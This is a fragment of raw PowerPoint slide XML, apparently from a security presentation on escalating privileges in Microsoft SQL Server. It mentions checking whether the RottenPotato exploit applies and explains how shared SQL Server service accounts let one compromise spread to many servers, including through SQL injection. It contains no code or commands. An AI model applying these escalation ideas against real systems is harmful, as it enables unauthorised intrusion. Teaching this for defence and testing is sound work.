                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>addition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>, do not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>forget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>RottenPotato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>applies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>RottenPotato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>escalate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5C"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3306269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9A96-AA11-E543-ACD1-0402A03A627C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Indirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Accounts</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD16ECF-1775-E741-8CDD-701246EB1DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server run in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, by default. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Organizations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>utilize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to run many SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Consequently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a single SQL Server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>compromise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>remotely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>possibly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>administrative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>underlying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> OS as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>practice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>give</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> SQL Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>administrative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>privileges</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236287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27D8-473D-DA48-869B-FA218AA6B57A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Indirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
